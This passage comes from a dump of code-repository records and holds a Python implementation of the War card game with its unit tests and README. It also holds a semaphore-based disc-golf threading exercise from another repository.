player2_card)\n\n\tg.table_cards.clear()\n\n\tassert (len(g.player2.hand.cards) == player2_deck_size_before + 1) and (len(g.player1.hand.cards) == player1_deck_size_before - 1), \"Player 2 should have one more card, and player 1 should have one less\"\n\ndef test_cards_on_table():\n\tprint(\"########## Testing Cards On Table\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.player1.hand.empty_the_hand()\n\tg.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['spades', '6'], ['diamonds', '7'], ['spades', '3'], ['hearts', '10']]\n\tplayer2_cards= [['clubs', 'K'], ['clubs', '5'], ['diamonds', '8'], ['hearts', '5']]\n\n\tg.player1.hand.add_cards(player1_cards)\n\tg.player2.hand.add_cards(player2_cards)\n\n\tplayer1_card = g.player1.hand.play_card()\n\tplayer2_card = g.player2.hand.play_card()\n\n\tg.check_cards(player1_card, player2_card)\n\n\tcards_on_table = g.table_cards.copy()\n\n\tg.table_cards.clear()\n\n\tassert (player1_card in cards_on_table) and (player2_card in cards_on_table), \"cards should be on table\"\n\ndef test_war():\n\tprint(\"########## Testing War\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.player1.hand.empty_the_hand()\n\tg.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['diamonds', '6'], ['clubs', '7'], ['spades', '3'], ['spades', '2'], ['clubs', '10']]\n\tplayer2_cards= [['hearts', 'K'], ['spades', '5'], ['diamonds', '8'], ['diamonds', 'A'], ['hearts', '10']]\n\n\tg.player1.hand.add_cards(player1_cards)\n\tg.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(g.player1.hand.cards)\n\tplayer2_deck_size_before = len(g.player2.hand.cards)\n\n\tplayer1_card = g.player1.hand.play_card()\n\tplayer2_card = g.player2.hand.play_card()\n\n\tg.check_cards(player1_card, player2_card)\n\n\tassert (len(g.player2.hand.cards) == player2_deck_size_before + 5) and (len(g.player1.hand.cards) == player1_deck_size_before - 5), \"Player 2 should have 5 more cards, and player 1 should have 5 less\"\n\n\ndef test_war_with_no_enough_cards():\n\tprint(\"########## Testing War No Enough Cards\")\n\tgame = Game([\"Luis\", \"Computer\"])\n\tgame.player1.hand.empty_the_hand()\n\tgame.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['diamonds', '6'], ['clubs', '7'], ['clubs', '10']]\n\tplayer2_cards= [['hearts', 'K'], ['spades', '5'], ['diamonds', '8'], ['diamonds', 'A'], ['hearts', '10']]\n\n\tgame.player1.hand.add_cards(player1_cards)\n\tgame.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(game.player1.hand.cards)\n\tplayer2_deck_size_before = len(game.player2.hand.cards)\n\n\tplayer1_card = game.player1.hand.play_card()\n\tplayer2_card = game.player2.hand.play_card()\n\n\tprint(game.player1.hand.cards)\n\tprint(game.player2.hand.cards)\n\n\tgame.check_cards(player1_card, player2_card)\n\n\tassert (len(game.player2.hand.cards) == player2_deck_size_before + player1_deck_size_before) and (len(game.player1.hand.cards) == 0), \"Player 2 should have all the cards, and player 1 should have zero cards\"\n\ndef test_multiple_wars():\n\tprint(\"########## Testing Multiple Wars\")\n\tgame = Game([\"Luis\", \"Computer\"])\n\tgame.player1.hand.empty_the_hand()\n\tgame.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['clubs', '4'],['diamonds', '4'], ['diamonds', '5'], ['diamonds', '2'], ['diamonds', 'K'], ['clubs', '7'], ['clubs', '3'], ['clubs', '2'], ['clubs', '10']]\n\tplayer2_cards= [['hearts', 'Q'], ['spades', '5'], ['spades', '8'], ['spades', 'A'],['spades', 'K'], ['hearts', '5'], ['hearts', '8'], ['hearts', 'A'], ['hearts', '10']]\n\n\tgame.player1.hand.add_cards(player1_cards)\n\tgame.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(game.player1.hand.cards)\n\tplayer2_deck_size_before = len(game.player2.hand.cards)\n\n\tplayer1_card = game.player1.hand.play_card()\n\tplayer2_card = game.player2.hand.play_card()\n\n\tgame.check_cards(player1_card, player2_card)\n\n\tcards_on_table = game.table_cards.copy()\n\n\tassert (len(cards_on_table) == len(player1_cards) + len(player2_cards)) and (len(game.player2.hand.cards) == player2_deck_size_before + player1_deck_size_before) and (len(game.player1.hand.cards) == 0), \"Player 2 should have all the cards, and player 1 should have zero cards\"\n\ndef test_game():\n\tprint(\"########## Testing Game\")\n\tgame = Game([\"Luis\", \"Computer\"])\n\tgame.start()\n\n\tassert (len(game.player1.hand.cards) == 52 and len(game.player2.hand.cards) == 0) or (len(game.player2.hand.cards) == 52 and len(game.player1.hand.cards) == 0), \"One player should have all of the cards\"\n\n\n\nif __name__ == \"__main__\":\n\ttest_game()\n\ttest_game_set_up()\n\ttest_player1_higher_Card()\n\ttest_player2_higher_Card()\n\ttest_cards_on_table()\n\ttest_war()\n\ttest_war_with_no_enough_cards()\n\ttest_multiple_wars()\n\tprint(\"##########################\")\n\tprint(\"Everything passed\")\n" }, { "alpha_fraction": 0.6677316427230835, "alphanum_fraction": 0.6789137125015259, "avg_line_length": 26.2608699798584, "blob_id": "1929386e851c6e677af27a1e1995d2f36ef037b9", "content_id": "88744f0709bc7bd7c9cbc90c7279ab5c8a3637d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 626, "license_type": "no_license", "max_line_length": 58, "num_lines": 23, "path": "/tests/test_player.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(0,'..')\n\nfrom war_game import Hand\nfrom war_game import Deck\nfrom war_game import Player\n\ndef test_cards_size_from_war_play():\n\td = Deck()\n\tplayer = Player(\"Luis\", Hand(d.cards))\n\tcards_facing_down = player.war_play()\n\tassert len(cards_facing_down) == 3, \"should be 3 cards\"\n\ndef test_players_hand_size_after_war():\n\td = Deck()\n\tplayer = Player(\"Luis\", Hand(d.cards))\n\tcards_facing_down = player.war_play()\n\tassert len(player.hand.cards) == 49, \"should be 49 cards\"\n\nif __name__ == \"__main__\":\n test_players_hand_size_after_war()\n test_cards_size_from_war_play()\n print(\"Everything passed\")" }, { "alpha_fraction": 0.6511968970298767, "alphanum_fraction": 0.6641426682472229, "avg_line_length": 26.296667098999023, "blob_id": "38333e4d2cfd3d031fcb383a19bafeefca7d870e", "content_id": "5598cf25f5609773f2c272d768d082e642c422ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8192, "license_type": "no_license", "max_line_length": 120, "num_lines": 300, "path": "/war_game.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import random\n\nsuits = ['spades','hearts','diamonds', 'clubs']\nranks = ['2','3','4','5','6','7','8','9','10','J','Q','K','A']\n\n\nclass Deck:\n\t\"\"\"\n\t A Deck of cards.\n\n\t It will create a deck of 52 cards. \n\n\t A card is represented like this [suites, ranks].\n\n\t To shuffle the deck use shuffle()\n\n\t Attributes:\n\t cards: A list of lists representing cards.\n\t\"\"\"\n\t\n\tdef __init__(self):\n\t\tself.cards = []\n\t\tself.build_deck()\n\n\tdef build_deck(self):\n\t\t\"\"\" \n\t\t Itereates through the lists of suits and ranks to create a list of cards. \n\t\t\"\"\"\n\t\tfor suit in suits:\n\t\t\tfor rank in ranks:\n\t\t\t\tself.cards.append([suit, rank])\n\n\tdef shuffle(self):\n\t\t\"\"\" Shuffes the deck of cards \"\"\"\n\t\trandom.shuffle(self.cards)\n\n\nclass Hand:\n\t\"\"\"\n\t A hand of cards. \n\n\t Players will use this class to manage their cards and perform \n\t actions during a game. \n\n\t Attributes:\n\t cards: A list of lists representing cards.\n\t\"\"\"\n\tdef __init__(self, cards):\n\t\tself.cards = cards\n\n\tdef play_card(self):\n\t\t\"\"\" \n\t\t Play a card from the hand. \n\n\t\t It will remove and return the card from the top of the \n\t\t players' deck.\n\n\t\t Returns:\n\t\t A list representing a card. [suites, ranks]\n\n\t\t Raises:\n\t\t Index Error if the list is empty.\n\t\t\"\"\"\n\t\treturn self.cards.pop()\n\n\tdef add_cards(self, cards):\n\t\t\"\"\"\n\t\t Add cards to Players Hand. \n\n\t\t Add cards to the beginning of the list. Or bottom of the deck. \n\n\t\t Args:\n\t\t cards: A list of cards. \n\t\t\"\"\"\n\t\tself.cards = cards + self.cards\n\n\tdef show_cards(self):\n\t\t\"\"\" Printing a players card \"\"\"\n\t\tprint(self.cards)\n\n\tdef is_empty(self):\n\t\t\"\"\" \n\t\t Check if the hand is empty.\n\n\t\t Return true if there are not any cards on the players hand. \n\n\t\t Returns:\n\t\t True or false depending if the hand is empty or not. \n\t\t\"\"\"\n\t\treturn len(self.cards) == 0\n\n\tdef empty_the_hand(self):\n\t\t\"\"\"\n\t\t Remove all of the cards from the hand. \n\n\t\t Remove cards and return cards removed. \n\n\t\t Returns:\n\t\t List of cards that were removed from hand. \n\t\t\"\"\"\n\t\ttemp = self.cards.copy()\n\t\tself.cards.clear()\n\t\treturn temp\n\n\nclass Player:\n\t\"\"\"\n\t A player for the game. \n\n\t Attributes:\n\t name: The name of the player\n\t hand: A hand object. The hand the player will use to play the game. \n\t\"\"\"\n\n\tdef __init__(self, name, hand):\n\t\tself.name = name\n\t\tself.hand = hand\n\n\tdef war_play(self):\n\t\t\"\"\"\n\t\t A war play\n\n\t\t Gives the 3 cards from the top of the deck. \n\n\t\t It gets the 3 cards. Then, it removes them from the players hand. \n\t\t\t\n\t\t Returns:\n\t\t List of cards\n\t\t\"\"\"\n\t\tcards_facing_down = self.hand.cards[len(self.hand.cards)-3:]\n\t\tdel self.hand.cards[len(self.hand.cards)-3:]\n\t\treturn cards_facing_down\n\n\nclass Game:\n\t\"\"\"\n\t The War Game.\n\n\t Creates a game with all the funcionality to set it up and to play it.\n\n\t To initialize it, it needs the name of two players. Then it will create two Players\n\t with half of a shuffled deck of cards. \n\n\t Attributes:\n \t table_cards: A list of cards that are currently being played, or are in the table.\n\t player1: A player that will play the game.\n\t player2: Second player for the game. \n\t\"\"\"\n\n\tdef __init__(self, players):\n\t\tdeck = Deck()\n\t\tdeck.shuffle()\n\t\tself.table_cards = []\n\t\tself.player1 = Player(players[0], Hand(deck.cards[26:]))\n\t\tself.player2 = Player(players[1], Hand(deck.cards[:26]))\n\n\tdef start(self):\n\t\t\"\"\"\n\t\t Starts a game.\n\n\t\t It will play a card everytime until a player ends up with an empty hand.\n\n\t\t After the players play their cards, it will compare them to see who wins. \n\n\t\t After a player with empty hands is found it will check the results. \n\t\t\"\"\"\n\t\tprint(\"Starting game\")\n\t\tcount = 0\n\t\twhile not self.player1.hand.is_empty() and not self.player2.hand.is_empty():\n\t\t\tprint(\"Turn \" + str(count))\n\n\n\t\t\tprint(\"Player1 number of cards \" + str(len(self.player1.hand.cards)))\n\t\t\tprint(\"Player2 number of cards \" + str(len(self.player2.hand.cards)))\n\t\t\tcount = count + 1\n\n\t\t\tplayer1_card = self.player1.hand.play_card()\n\t\t\tplayer2_card = self.player2.hand.play_card()\n\n\t\t\tprint(\"Player1 playing \" + str(player1_card))\n\t\t\tprint(\"Player2 playing \" + str(player2_card))\n\n\t\t\tself.check_cards(player1_card, player2_card)\n\n\t\t\tself.empty_table()\n\t\t\tprint(\"Cards in table \" + str(self.table_cards))\n\t\t\tprint(\"#########################################\")\n\n\n\t\tself.check_results()\n\t\t\t\n\n\tdef check_cards(self, player1_card, player2_card):\n\t\t\"\"\"\n\t\t Check the cards players played \n\n\t\t It compares two cards and it will add the cards on the table to \n\t\t whoevers card's is higher. \n\n\t\t In case the cards are the same it will do WAR!! It will take 3 cards from\n\t\t each player, add them to the table, and then the process will repeat again \n\t\t with a new cards. \n\n\t\t If a players doesn't have enough cards to play WAR. It will empty their hands,\n\t\t and put the on the table. And then the other player will gain the cards from the table.\n\n\t\t Args:\n\t\t player1_card: A card played from Player1\n\t\t player2_card: A card played from Player2\n\t\t Raises:\n\t\t IndexError: If the cards provided are not in the right format [suit. rank]\n\t\t\"\"\"\n\t\tself.table_cards.append(player1_card)\n\t\tself.table_cards.append(player2_card)\n\n\t\tprint(\"Cards in table \" + str(self.table_cards))\n\n\t\tif ranks.index(player1_card[1]) > ranks.index(player2_card[1]):\n\t\t\tprint(\"Player 1 WON!\")\n\t\t\tself.player1.hand.add_cards(self.table_cards)\n\t\telif ranks.index(player1_card[1]) < ranks.index(player2_card[1]):\n\t\t\tprint(\"Player 2 WON!\")\n\t\t\tself.player2.hand.add_cards(self.table_cards)\n\t\telse:\n\t\t\tprint(\"WAR!!!\")\n\t\t\tif self.player1.hand.is_empty() or self.player2.hand.is_empty():\n\t\t\t\treturn\n\n\t\t\tif len(self.player1.hand.cards) < 4:\n\t\t\t\tprint(\"Player 1 doesn't have enough cards!\")\n\t\t\t\tplayer1_last_cards = self.player1.hand.empty_the_hand()\n\t\t\t\tself.table_cards = self.table_cards + player1_last_cards\n\t\t\t\tself.player2.hand.add_cards(self.table_cards)\n\t\t\t\treturn\n\t\t\telif len(self.player2.hand.cards) < 4:\n\t\t\t\tprint(\"Player 2 doesn't have enough cards!\")\n\t\t\t\tplayer2_last_cards = self.player2.hand.empty_the_hand()\n\t\t\t\tself.table_cards = self.table_cards + player2_last_cards\n\t\t\t\tself.player1.hand.add_cards(self.table_cards)\n\t\t\t\treturn\n\n\t\t\tplayer1_facing_down_cards = self.player1.war_play()\n\t\t\tplayer2_facing_down_cards = self.player2.war_play()\n\n\t\t\tself.table_cards = self.table_cards + player1_facing_down_cards + player2_facing_down_cards\n\n\t\t\tplayer1_second_card = self.player1.hand.play_card()\n\t\t\tplayer2_second_card = self.player2.hand.play_card()\n\n\t\t\tprint(\"Player1 playing \" + str(player1_second_card))\n\t\t\tprint(\"Player2 playing \" + str(player2_second_card))\n\n\t\t\tself.check_cards(player1_second_card, player2_second_card)\n\n\tdef check_results(self):\n\t\t\"\"\" \n\t\t Display which player is the winner by checking their hands. \n\t\t\"\"\"\n\t\tif self.player1.hand.is_empty():\n\t\t\tprint(\"Congrats! Player 2 WON!!!\")\n\t\telif self.player2.hand.is_empty():\n\t\t\tprint(\"Congrats! Player 1 WON!!!\")\n\t\telse:\n\t\t\tprint(\"Error!!!!\")\n\n\tdef empty_table(self):\n\t\t\"\"\"\n\t\t Empty the cards on the table. \n\t\t\"\"\"\n\t\tself.table_cards = []\n\n\tdef display_game_info(self):\n\t\t\"\"\"\n\t\t Prints the information of the game into the console. \n\t\t\"\"\"\n\t\tprint(\"##### WELCOME TO WAR ##############\")\n\t\tprint(\"Player 1: %s\" % self.player1.name)\n\t\tprint(\"Player 2: %s\" % self.player2.name)\n\t\tprint(\"--------------------------------------\")\n\n\t\trules = \"\"\"\\nRules:\\n\nThe objective of the game is to win all of the cards.\n\nThe deck is divided evenly among the players, giving each a down stack. In unison, \neach player reveals the top card of their deck—this is a \"battle\"—and the player with \nthe higher card takes both of the cards played and moves them to their stack. Aces are high, and suits are ignored.\n\nIf the two cards played are of equal value, then there is a \"war\". Both players place the next three cards of their \npile face down and then another card face-up. The owner of the higher face-up card wins the war and adds all the cards \non the table to the bottom of their deck. If the face-up cards are again equal then the battle repeats with another set \nof face-down/up cards. This repeats until one player's face-up card is higher than their opponent's.\n\"\"\"\n\n\t\tprint(rules)\n\nif __name__ == \"__main__\":\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.display_game_info()\n\tinput(\"Press Enter to continue...\")\n\tg.start()" }, { "alpha_fraction": 0.6387665271759033, "alphanum_fraction": 0.6530836820602417, "avg_line_length": 21.170732498168945, "blob_id": "d12747197b784f48d433978c8a1f992fa5487208", "content_id": "ebd4eaeb8bff6b36b964c141ba1b3368d009dfc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 908, "license_type": "no_license", "max_line_length": 88, "num_lines": 41, "path": "/tests/test_hand.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(0,'..')\n\nfrom war_game import Hand\nfrom war_game import Deck\n\ndef test_card_play_size():\n\td = Deck()\n\th = Hand(d.cards)\n\tcard = h.play_card()\n\tassert len(h.cards) == 51, \"should be 51 cards\"\n\ndef test_card_play():\n\td = Deck()\n\th = Hand(d.cards)\n\tcard = h.play_card()\n\tassert not card in h.cards, \"should not be in hand\"\n\ndef test_empty_hands():\n\td = Deck()\n\th = Hand(d.cards)\n\tcards = h.empty_the_hand()\n\tassert h.is_empty() and len(cards) == 52, \"should be empty and temp cards should be 52\"\n\ndef test_adding_cards():\n\td = Deck()\n\th = Hand(d.cards)\n\ttemp_cards = []\n\ttemp_cards.append(h.play_card())\n\ttemp_cards.append(h.play_card())\n\ttemp_cards.append(h.play_card())\n\th.add_cards(temp_cards)\n\tassert len(h.cards) == 52, \"should be 52 cards\"\n\n\nif __name__ == \"__main__\":\n\ttest_card_play_size()\n\ttest_card_play()\n\ttest_empty_hands()\n\ttest_adding_cards()\n\tprint(\"Everything passed\")" }, { "alpha_fraction": 0.6391509175300598, "alphanum_fraction": 0.650943398475647, "avg_line_length": 19.238094329833984, "blob_id": "58cfb1eea5dcb1389a8212f38ad3772e3df7119b", "content_id": "f3a7ed150c9671eae468fd4067d8aca0e0479df0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 424, "license_type": "no_license", "max_line_length": 71, "num_lines": 21, "path": "/tests/test_deck.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(0,'..')\n\nfrom war_game import Deck\n\ndef test_deck_size():\n\td = Deck()\n\tsize = len(d.cards)\n\tassert size == 52, \"should be 52 cards\"\n\ndef test_shuffle():\n\tdeck_shuffled = Deck()\n\tdeck_shuffled.shuffle()\n\t\n\tdeck_regular = Deck()\n\tassert deck_shuffled.cards != deck_regular.cards, \"Shouldn't be equal\"\n\nif __name__ == \"__main__\":\n test_deck_size()\n test_shuffle()\n print(\"Everything passed\")" }, { "alpha_fraction": 0.7132301330566406, "alphanum_fraction": 0.7515833973884583, "avg_line_length": 41.43283462524414, "blob_id": "b8908610736ba26c5a5db7468dfd1447e732b0e1", "content_id": "7ec7fc0996e95d558b986c5f54d3fb7bae5cc4fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2846, "license_type": "no_license", "max_line_length": 263, "num_lines": 67, "path": "/README.md", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "# War Battle\n\nA card game for two players using Python.\n\n## Rules of the game\n\nThe objective of the game is to win all of the cards.\n\nThe deck is divided evenly among the players, giving each a down stack. In unison, each player reveals the top card of their deck—this is a \"battle\"—and the player with \nthe higher card takes both of the cards played and moves them to their stack. Aces are high, and suits are ignored.\n\nIf the two cards played are of equal value, then there is a \"war\". Both players place the next three cards of their \npile face down and then another card face-up. The owner of the higher face-up card wins the war and adds all the cards \non the table to the bottom of their deck. If the face-up cards are again equal then the battle repeats with another set \nof face-down/up cards. This repeats until one player's face-up card is higher than their opponent's.\n\n[More Info](https://en.wikipedia.org/wiki/War_(card_game))\n\n## Dependencies\n\n* **Python3**\n\n## Running the game\n\n To start a game you need to initialize a Game object with the name of the two players that are going to participate. And then run the start() function. \n \n``` python \ngame = Game([\"Luis\", \"Computer\"])\ng.start()\n```\n\nTo run the game:\n\n```\npython3 war_game.py\n```\n\n## Testing\n\nFrom the tests directory run the test you want to run.\n\n```\ntests: python3 test_game.py\n```\n\n## Notes\n\n- When there is a war battle, we remove three cards from the player's hand instead of one. This way the game will be completed faster.\n- The cards won by a player are added at the bottom of their hand without shuffling them.\n- From time to time, we will encounter a deck without War battles in them. This will make a game to last a lot of time, sometimes even infinite. I believe that this will be resolved by shuffling the cards won by a player. However, this doesn't happen very often. \n\n## TODO\n\n- **Shuffle cards won by players**. Create a deck with the cards won by a player. When their hand is empty: take the deck of cards won, shuffle them, and then add them to the player's hand. And repeat.\n- **Better logging**. Right now, we are just printing messages to the console. With a better logging feature we could have a cleaner interface for playing and testing. \n- **Better User Interface**. It will be fun to create a GUI interface or even a website that players could interact with. Maybe using Kivy or Django.\n\n## Screenshots\n\n### Running the game\n![start-war-game](https://user-images.githubusercontent.com/7850532/80838283-87abae80-8bad-11ea-9dec-f41a2a0f1555.png)\n\n### End of the game\n![end-card-game](https://user-images.githubusercontent.com/7850532/80838368-be81c480-8bad-11ea-94f6-8645006b6452.png)\n\n### Example of war battle\n![example-of-war-battle](https://user-images.githubusercontent.com/7850532/80838449-e6712800-8bad-11ea-8811-267f34d1f916.png)" } ]
6
deliotclarke/henloPy
https://github.com/deliotclarke/henloPy
490a8403c81c1b39df8b106e6c8243acd199ed5a
dd3caa02ddea5bdbbf118bde9c59d1e126c626cd
dbafe746047eb6304476a98dbd975a1dc5761b89
refs/heads/master
2022-11-12T07:02:37.984869
2020-06-29T15:41:10
2020-06-29T15:41:10
275,856,421
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.633147120475769, "alphanum_fraction": 0.6672874093055725, "avg_line_length": 17.73255729675293, "blob_id": "d63ac786823d21ada37e78d275c172ab53d40410", "content_id": "356ec918db46b873caae46a287c08c5e271c024f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1611, "license_type": "no_license", "max_line_length": 74, "num_lines": 86, "path": "/henlo.py", "repo_name": "deliotclarke/henloPy", "src_encoding": "UTF-8", "text": "from numpy import array\n\nmsg = \"Henlo Snakes!\"\nprint(msg)\n\n# playing in cars with pythons\ncars = ['El Camino', 'El Camino', 'El Camino']\n\n# simple printing loop\nfor x in cars:\n print(x)\n\n# add an item to a list\ncars.append('Bob Marley')\n\n# the ol loop and print\nfor x in cars:\n print(x)\n\n# storing a value at an index in list\ny = cars[3]\n\n# you guessed it\nprint(y)\n\n# printing the length of a list\nprint(len(cars))\n\n# copy the contents of the list\ncars2 = cars.copy()\n\n# clear contents of a list\ncars.clear()\n\n# is it real?\nprint(\"cars length: \", len(cars))\nprint(\"cars 2 length: \", len(cars2))\n\n# count() stores the instances of a value in your list\nprint(\"El Camino Count: \", cars2.count(\"El Camino\"))\n\n# a dictionary!!\nthisdict = {\n \"brand\": \"Ford\",\n \"model\": \"Mustang\",\n \"year\": 1967\n}\n\n# print it\nprint(thisdict)\n\n# print just the value of a key in the dictionary\nprint(thisdict[\"model\"])\n\n# changing the value of a key in said dictionary\nthisdict[\"year\"] = 1965\n\n# sometimes you've got to print to check\nprint(thisdict)\n\n# looping a dictionary's keys\nfor x in thisdict:\n print(x)\n\n# looping a dictionary's values\nfor x in thisdict:\n print(thisdict[x])\n\n# looping both, but with a conditional to only pring if the key is \"model\"\nfor x, y in thisdict.items():\n if x is \"model\":\n print(x, y)\n\ncost = [4, 8, 12, 16, 20, 100, 120, 60, 13]\n\n# not possible with lists - going to import array from numpy to try again\n# divided_cost = cost/2\n\n# print(divided_cost)\n\n# works! super interesting\ncost2 = array([4, 8, 12, 16, 20, 100, 120, 60, 13])\n\ndivided_cost2 = cost2/2\n\nprint(divided_cost2)\n" } ]
1
farhatlamia/workshop8
https://github.com/farhatlamia/workshop8
bf58559130f7c05bd776b8956fb7c30d34822249
ad073261ad3a44f7158ee32fb4f6eae10d2bd339
44194300438af0452346fa2d855c82110f6235ab
refs/heads/main
2023-09-05T04:56:14.228612
2021-11-08T21:07:11
2021-11-08T21:07:11
425,993,738
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5806763172149658, "alphanum_fraction": 0.591304361820221, "avg_line_length": 19.520000457763672, "blob_id": "1e44c3054232ccce3a4eb7b0c629c7bb00631823", "content_id": "8789ad43c3736910abb57b7f7ea50a16ef3324da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1035, "license_type": "no_license", "max_line_length": 61, "num_lines": 50, "path": "/w8.py", "repo_name": "farhatlamia/workshop8", "src_encoding": "UTF-8", "text": "import json\nimport csv\n\n#load json file first\nf = open('scan.results.json')\ndata = json.load(f)\n#print(data)\n\nresult = data[\"vulnerabilities\"]\nprint(result)\n\nfinal = {}\nmylist = []\n \nfor i in result:\n cve = {}\n alerts = {}\n \n #list to string\n #alerts[\"CVE-id\"]= i[\"identifiers\"][\"CVE\"]\n cve = i[\"identifiers\"][\"CVE\"]\n alerts[\"CVE-ID\"] = ''.join(cve)\n \n #remove new line\n alerts[\"DESCRIPTION\"]= i[\"description\"].replace('\\n', '')\n \n\n alerts[\"SEVERITY\"]= i[\"nvdSeverity\"]\n mylist.append(alerts)\n final[\"workshop8\"] = mylist\n\nwith open(\"sample1.json\", \"w\") as fhandle:\n json.dump(final, fhandle, indent=4)\n \nwith open('sample1.json') as json_file:\n data1 = json.load(json_file)\n\nem_data = data1['workshop8']\n \ndata_file = open('sample1.csv', 'w')\ncsv_writer = csv.writer(data_file)\n\ncount = 0\nfor i in em_data:\n if count == 0:\n header = i.keys()\n csv_writer.writerow(header)\n count +=1\n csv_writer.writerow(i.values())\ndata_file.close()\n\n \n\n\n\n" } ]
1
erichysen/IIT-Classes
https://github.com/erichysen/IIT-Classes
3c1a20ee468a8c6c757686a86a9694f443d85e59
f8337bd6112115a59262ed7007b8317e7d668cb1
94e22f101e716665d0611a7162643648ce1e0283
refs/heads/master
2020-04-07T06:47:26.368291
2016-06-29T03:56:09
2016-06-29T03:56:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5773659348487854, "alphanum_fraction": 0.5874754190444946, "avg_line_length": 40.89411926269531, "blob_id": "a64df44c87b23a4180f32686c74a5ca017b6f5a4", "content_id": "5c24cb1ad9db8dceed048023f6da94a59c9480a8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3561, "license_type": "permissive", "max_line_length": 116, "num_lines": 85, "path": "/mp3/1_disc_golf_range.py", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "\"\"\"Hard coded variables are on lines 27-29. Just run with Python3 1_disc_golf_range.py\"\"\"\nfrom threading import Semaphore, Thread\nfrom time import sleep\nimport random\n\"\"\"\nUNSYNC CODE\n# frolfer\nwhile True:\n stash -= N # call for bucket\n for i in range(0,N): # for each disc in bucket,\n discs_on_field += 1 # throw (maybe simulate with a random sleep)\n\n# cart\nwhile True:\n stash += discs_on_field # collect discs and deposit in stash\n\"\"\"\n\nrand = random.Random()\n#rand_num = rand.seed(100)\n\nMAX_CART_RUNS = 10 #change this to number of times cart can fetch discs currently IS [IS NOT] in use.\n\nclass frolf_game:\n\tdef __init__(self):\n\t\t#self.discs = 0 not needed\n#***************************************#\n\t\tself.frolfers = 3 #frolfers playing\t\n\t\tself.stash = 20 #20 discs in the stash\n\t\tself.bucket= 5 #5 discs per bucket\n#***************************************#\n\t\tself.thrown = 0 #discs thrown\n\t\tself.cart_cycles=0 ##times cart has fetched discs \n\t\ngame=frolf_game()\nmutex = Semaphore(1) \t\t\t\t\t\t\t\t\t#for changing frolf_game attributes\ncart = Semaphore(0)\nstash_empty = Semaphore(0) \nthrowing = Semaphore(1)\t\t\t\t\t\t\t\t\t#protect multiple player threads from throwing and modifying thrown disc shared data\n\ndef player_thread(player):\n\tglobal game\n\trand.seed(100) \t\t\t\t#rand number seed\n\trand_num=rand.random() \n # while(game.cart_cycles<MAX_CART_RUNS): \t\t\t#change condition to true for infinite looping\n\twhile(1):\n\t\tmutex.acquire() \t\t\t# block from other threads changing frolf_game vars\n\t\tprint('Frolfer',player,'calls for the bucket.')\n\t\tif game.stash >= game.bucket: #first frolfer calls for the bucket\n\t\t\tgame.stash = game.stash-game.bucket \t\t#fix stash after bucket filled\n\t\t\tprint('Frolfer',player,'got',game.bucket,'discs; ','Stash = ',game.stash)\n\t\telse:\n\t\t\tstash_empty.release() \t\t#stash empty, permit cart to refill. Block throwing.\n\t\t\tcart.acquire() \n #print(\"debug\")\n\t\t\tgame.stash = game.stash-game.bucket\t\t\t#fix stash after bucket filled\n\t\t\tprint('Frolfer',player,'got',game.bucket,'discs;','Stash = ',game.stash)\n\t\tmutex.release() \t\t\t#permit modification of frolf_game variables\n\t\tfor i in range(game.bucket): \n\t\t\tthrowing.acquire() \t \t\t\t#block to avoid thrown disc contention between frolfers\n\t\t\tprint('Frolfer',player,'threw disc:',i)\n\t\t\tgame.thrown +=1\t\t\t\t\t\t\t\t#cs\n\t\t\tthrowing.release() \t\t\t\t#unblock for other throwers. Can be preempted in loop for concurrent throwing.\n\t\t\tsleep (rand_num)\n\ndef cart_thread(): \t\t #blocks throwers from throwing while reclaiming thrown discs.\n\tglobal game\n\t#while(game.cart_cycles<MAX_CART_RUNS): \n \t\t\t\t\t\t\t\t\t\t\t\t#^can be replaced with 1 to continue forever.\n\twhile(1):\n\t\tstash_empty.acquire()\n\t\tprint('################################################################################')\n\t\tprint('Stash = ', game.stash,'disc[s];',' Cart entering the field!')\n\t\tgame.stash += game.thrown\n\t\tprint('Cart done, gathered ',game.thrown,' discs; ','Stash =',game.stash, 'discs.')\n\t\tgame.thrown = 0\n\t\tprint('################################################################################')\n\t\tgame.cart_cycles+=1\t\t\t\t\t\t\t\t#debug\n\t\tcart.release() \t\t\t\t#only cart\n\nif __name__ == '__main__':\n\tc = Thread(target= cart_thread)\n\tc.start() \n\tfor i in range (game.frolfers):\t\t\t\t\t\t#thread for each player\n\t\tp = Thread(target=player_thread,args=[i]) \n\t\tp.start()\n" }, { "alpha_fraction": 0.5991639494895935, "alphanum_fraction": 0.6196005344390869, "avg_line_length": 12.626582145690918, "blob_id": "4336aca5504e5232784d22c50f36201695b0cb57", "content_id": "3e1be80270b108b674debfc3eb9ac36284092e19", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2153, "license_type": "permissive", "max_line_length": 93, "num_lines": 